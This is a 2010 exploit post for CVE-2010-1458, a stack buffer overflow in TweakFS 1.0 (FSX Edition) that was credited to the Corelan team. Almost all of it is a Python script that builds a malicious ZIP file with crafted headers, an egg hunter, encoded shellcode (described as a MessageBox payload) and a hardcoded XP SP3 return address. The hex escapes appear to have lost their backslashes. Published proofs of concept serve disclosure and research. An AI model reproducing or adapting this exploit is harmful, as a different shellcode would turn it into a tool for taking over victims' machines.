TweakFS 1.0 (FSX Edition) Stack buffer overflow
Posted on 19 April 2010
=============================================== TweakFS 1.0 (FSX Edition) Stack buffer overflow =============================================== # Exploit Title : TweakFS 1.0 (FSX Edition) # CVE : CVE-2010-1458 # Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-026 # Date : April 7th, 2010 # Author : corelanc0d3r # Bug found by : TecR0c # Software Link : http://tweakfs.com/ # Version : 1.0 # OS : Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln : Direct RET / SEH # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes. # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # # Code : print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "| http://www.corelan.be:8800 |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--| " print " [+] Exploit for TweakFS 1.0 - only works on XP SP3"; print " [+] Preparing payload..." ldf_header = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00" "xe4x0f" "x00x00x00") cdf_header = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" "x00x00x00x00x00x00x00x00x00" "xe4x0f" "x00x00x00x00x00x00x01x00" "x24x00x00x00x00x00x00x00") eofcdf_header = ("x50x4Bx05x06x00x00x00x00x01x00x01x00" "x12x10x00x00" "x02x10x00x00" "x00x00") #egg esi, will jump to edi egg = "VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI" egg += "avMQzjioDOW2PRqzERCh8MVNGLC51J0tJOLxpwDptpQdlKXzloaeKZnO45IwkOM7A" getpc="x89x05x5ex98x99x46x46x8ax94x98x98x98" getpc += "x74x07x46x46x49x73x97" #loop getpc += "x77x85" #jump before getpc getpc += "x46x41x41x41" #nops nop="x42x42x33x90x41x41x41x41x41x41" #nops + prepare loop size=272 ret = "x7Cx22x48x7E" # 0x7E48227C user32.dll XP SP3 buff = "x41" * (125-len(nop)) buff += nop + getpc + egg + "x77x9F" #jmp between getpc and egg buff += "x41" * (size-len(buff)) buff += ret buff += "x41x77xA4x42" #jump back buff += "x3cx44x40x00" # null byte to avoid writing over end of stack (no SEH) buff += "w00tw00t" #edi basereg - MessageBox shellcode buff += "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkmKzyt4utzTt" buff += "qXRmbBZFQhIRDnkqavPLKqfdLNkrV7lNk1VwxLKSNQ0NkDvTxpOdXrUl3SiVa8QyoM1" buff += "1pNkRLwTDdlKQUwLnksdS5d8Wq8jnkQZwhLKQJq05QjKM3egQYnkVTLK31JNUaIoVQY" buff += "PKLNLK4O0cDfjKq8OVmUQIWyyHqKOYokOUkalgTdhSEyNnkBz5tVaJK2FNkTLPKLKrz" buff += "GlUQZKNkUTNkUQzHnipDwTUL3QKsoBwx5yXTNixeMYhBSXNnpNVnxlbrYxOlKOkOKOK" buff += "9qUwtMk3NxXM2rSNgWlgT2rixlKkOkOYoK9pEeXqx2LrLupYo58wC026Natph0u2SSU" buff += "proxSlWTDJLIXfrvkORuWtoyhBRpMkMxLbrmOLMWgl14v2yxcnkOKOKOaxRlQQrnQHQ" buff += "xBc2orrsutqKkMXQLq4uWMYKSsXprV8gPupPhpcFPsTecQxu5bLaq0nCXEpqs0oBR1x" buff += "cTepqrRY3XPopwbNSUvQ9Yk8pLWTWeMYyqdqzrBrV3saPRyozpTqo0rpKO1EUXA" buff += "x43" * (4064-len(buff)) # 4064 buff += ".txt" print " [+] Writing payload to file corelanc0d3r_tweakfs.zip" mefile = open('corelanc0d3r_tweakfs.zip','w'); mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header); mefile.close() print " [+] Wrote " + str(len(buff))+ " bytes to file" # Inj3ct0r.com [2010-04-19]
